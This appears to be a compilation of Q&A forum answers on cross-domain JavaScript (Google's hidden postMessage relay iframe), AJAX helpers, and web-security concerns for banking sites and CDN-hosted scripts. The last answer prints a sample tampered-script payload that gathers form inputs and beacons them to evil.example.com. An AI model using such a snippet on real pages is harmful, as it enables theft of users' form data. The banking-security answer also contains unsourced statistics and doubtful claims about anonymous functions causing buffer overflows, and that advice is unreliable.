[Google-api] How does Google's javascript API get around the cross-domain security in AJAX


Answers

The accepted answer is wrong. Ben is correct. Below is the actual iframe node pulled off a page using the Google API JavaScript Client.

<iframe name="oauth2relay678" id="oauth2relay678" 
        src="https://accounts.google.com/o/oauth2/postmessageRelay?
             parent=https%3A%2F%2Fwww.example.com.au#rpctoken=12345&amp;forcesecure=1" 
             style="width: 1px; height: 1px; position: absolute; left: -100px;">
</iframe>

A basic summary of how this works is here: http://ternarylabs.com/2011/03/27/secure-cross-domain-iframe-communication/. On modern browsers they use HTML5 postMessage to achieve communication, and on older browsers they use a neat multiple-iframe URL-hash read/write combination hack. Ternary Labs have made a library which abstracts all the hacky stuff away, essentially giving you postMessage on all browsers.
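On modern browsers the relay boils down to window.postMessage between your page and the hidden iframe served from Google's domain. The sketch below shows that general pattern only; the domain names, relay URL, and message format are placeholders, not Google's actual protocol:

// Parent page (e.g. https://www.example.com.au) -- all names here are illustrative
var relay = document.createElement('iframe');
relay.style.display = 'none';

// Only trust messages that actually come from the relay's origin
window.addEventListener('message', function (event) {
    if (event.origin !== 'https://accounts.example.com') return;
    console.log('response from relay:', event.data);
}, false);

// Once the hidden frame has loaded, post a request into it
relay.onload = function () {
    relay.contentWindow.postMessage('{"method":"auth.check"}',
                                    'https://accounts.example.com');
};

relay.src = 'https://accounts.example.com/postmessageRelay'; // page served from the API's domain
document.body.appendChild(relay);

// The relay page (served from accounts.example.com) would do roughly the mirror image:
// listen for 'message' events from the parent's origin, make a same-origin request
// back to the API, then event.source.postMessage(result, event.origin) to reply.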

One day I'll build on top of this library to simplify cross-domain REST APIs...

Edit: That day has come and XDomain is here - https://github.com/jpillora/xdomain

Question

How does Google's API make cross-domain requests back to Google, when it's on your website?




Want to create a JS plugin that sends a lot of data asynchronously to another server

You can use AJAX to send a lot of data.

Native JavaScript:

function NewAjax(){
    var xmlhttp = false;
    try{
        // Older Internet Explorer versions
        xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
    }catch(e){
        try{
            xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
        }catch(E){
            xmlhttp = false;
        }
    }

    // Standards-compliant browsers
    if(!xmlhttp && typeof XMLHttpRequest != 'undefined'){
        xmlhttp = new XMLHttpRequest();
    }
    return xmlhttp;
}
function load_page(url, container){
    var ajax = NewAjax();
    ajax.open("GET", url, true);
    ajax.onreadystatechange = function(){
        if(ajax.readyState == 1){
            container.innerHTML = "loading"; // <-- Preload
        }else if(ajax.readyState == 4){
            // Page loaded
            if(ajax.status == 200){
                // OK
                container.innerHTML = ajax.responseText;
                add_action(); // hook for re-binding handlers on the new content; defined by the caller
            }else if(ajax.status == 404){
                // Page doesn't exist
                container.innerHTML = "Error loading page";
            }else{
                // Show error
                container.innerHTML = "Error: " + ajax.status;
            }
        }
    };
    ajax.send(null);
}
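A quick usage sketch (the URL and element id are placeholders):

// Stub for the post-load hook referenced above
function add_action(){ /* re-bind any event handlers on the new content */ }

// Fetch a fragment and inject it into an existing element
var container = document.getElementById("result");
load_page("ajax/test.html", container);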

Or

jQuery AJAX:

$.ajax({
    url: 'ajax/test.html',
    success: function(data) {
        $('.result').html(data);
        alert('Load was performed.');
    }
});
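Since the question is about sending a lot of data to another server, a POST usually fits better than the GET shown above. A rough sketch, with placeholder URL and payload (a true cross-domain call additionally needs the receiving server's cooperation, e.g. CORS, or a relay like the postMessage approach in the first answer):

// Hypothetical example: POST a larger payload asynchronously
var largeObject = { /* ...lots of data to send... */ };

$.ajax({
    url: 'https://other-server.example.com/collect', // placeholder endpoint
    type: 'POST',
    data: { payload: JSON.stringify(largeObject) },
    success: function (response) {
        console.log('Data sent:', response);
    },
    error: function (xhr, status) {
        console.log('Send failed:', status);
    }
});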



Once the user logs in I would try to avoid any sort of client scripting except where ABSOLUTELY necessary. Here are my recommendations for web work regarding online financial services:

1) Send ALL assets to the user via HTTPS from the same domain. Although it is slower and more costly in bandwidth, it is also more secure because you control all the assets directly and can guard them against manipulation. By all assets I really mean all assets, even including images, since manipulation of images containing text content could be used to send false instructions in advance of a phishing attempt. In this regard I would not use a CDN to store your assets, because that is not a location you own, so you have less ability to monitor the stored data for tampering.

2) Do NOT use AJAX or anything else built on the XMLHttpRequest object. The point of asynchronous communication is to beacon information between points without reloading a page. That is great for usability, but it completely defeats security. Since it executes on the client side, compromised code can also be used to defeat legitimate SSL encryption by beaconing information from the user to an untrusted third party after the information is decrypted at the user's end. When dealing with purchases, PII, or financial data, ALWAYS ensure each information transaction from the user forces a page reload or a new page.

3) Avoid using any sort of client side scripting. That means do not use ActiveX, Flash, or even Acrobat at all. 95% of all reported security vulnerabilities are attributed to client side scripting, and 70% of those attacks target memory corruption of the processing software. Although JavaScript is not normally known for buffer overflows, I would still recommend using it as little as possible, and only to manipulate the DOM.

4) Never pass an anonymous function as an argument to a function or method in JavaScript. This is not something that commonly occurs, but in the case of certain built-in methods this can open a hole through the JavaScript interpreter to the processing software, which could then be an attack vector to insert the code necessary to cause a buffer overflow.

5) Do not use the onsubmit event to attach script execution to the submission of form data. Tampering with that executing code, or appending extra malicious code to it, can create a point at which the XMLHttpRequest function can anonymously beacon the form data to an untrusted third party before it is sent to the trusted source, even if the transfer protocol of the action attribute is HTTPS. (A plain-form alternative is sketched after this list.)

6) So long as you stick to VALID XHTML, CSS, and text for nearly all possible aspects of the user experience, and communicate using only HTTPS, you should be mostly fine.
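As a minimal sketch of what points 2, 5, and 6 describe (the URL and field names are placeholders): a static form posting over HTTPS, with no onsubmit handler and no XMLHttpRequest, so every transaction forces a full page load.

<!-- Hypothetical form: plain XHTML, HTTPS action, no client scripting -->
<form action="https://bank.example.com/transfer" method="post">
    <label for="amount">Amount</label>
    <input type="text" id="amount" name="amount" />
    <input type="submit" value="Submit transfer" />
</form>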

You have to keep in mind that banks and educational institutions receive 40% of all known attacks, so you MUST assume your work will be attacked and compromised. The average cost of a single attack in 2008 was $11.3 million. If the bank could come after you for those damages because you did not consider the full depth of security, how would you respond? Plan accordingly to ensure your work is as locked down as possible.




What security considerations / concerns should be addressed when using CDN hosted code?

If you're only using them as JavaScript includes, then because JavaScript runs purely client side, it potentially has access to anything and everything that gets rendered as XHTML through the DOM. The risk materializes if the CDN gets hacked and the JavaScript you are including is altered maliciously. See How does Google's javascript API get around the cross-domain security in AJAX for info on JavaScript being used cross-domain.
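As a purely illustrative sketch (the domains and endpoint are made up), a few lines appended to a compromised CDN copy of a library would be enough to read whatever the page renders and beacon it elsewhere:

// Hypothetical payload appended to a tampered CDN-hosted script.
// It scrapes form values from the page and sends them to a third-party server.
(function () {
    var stolen = [];
    var inputs = document.getElementsByTagName('input');
    for (var i = 0; i < inputs.length; i++) {
        stolen.push(inputs[i].name + '=' + inputs[i].value);
    }
    // Image-beacon trick: works cross-domain because it is just a GET for an image
    new Image().src = 'https://evil.example.com/log?d=' + encodeURIComponent(stolen.join('&'));
})();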

As others have said, it simply isn't worth the risk considering the almost zero advantages. JavaScript libraries are generally too small for the savings in server space, bandwidth, or access speed to matter.